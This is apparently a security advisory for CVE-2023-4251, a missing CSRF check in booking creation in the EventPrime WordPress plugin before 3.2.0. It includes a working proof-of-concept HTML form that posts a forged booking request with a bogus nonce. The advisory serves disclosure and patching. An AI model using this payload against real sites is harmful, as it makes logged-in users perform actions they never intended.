EventPrime < 3.2.0 – Booking Creation via CSRF | CVE 2023-4251

Description

The plugin does not have CSRF checks when creating bookings, which could allow attackers to make logged in users create unwanted bookings via CSRF attacks.

Proof of Concept

Create an Event, noting its ID. Add a ticket type to the Event (the details don't matter).

As a logged-in user, visit a page with the following form, replace the event ID, and submit the form. Note that a new Booking is created, despite the incorrect nonce.

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="text" name="action" value="ep_save_event_booking" />
      <textarea name="data">
ep_event_booking_event_id=EVENT_ID&ep_event_booking_user_id=1&ep_event_booking_total_price=0&ep_event_booking_total_tickets=1&ep_save_event_booking_nonce=1234
      </textarea>
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>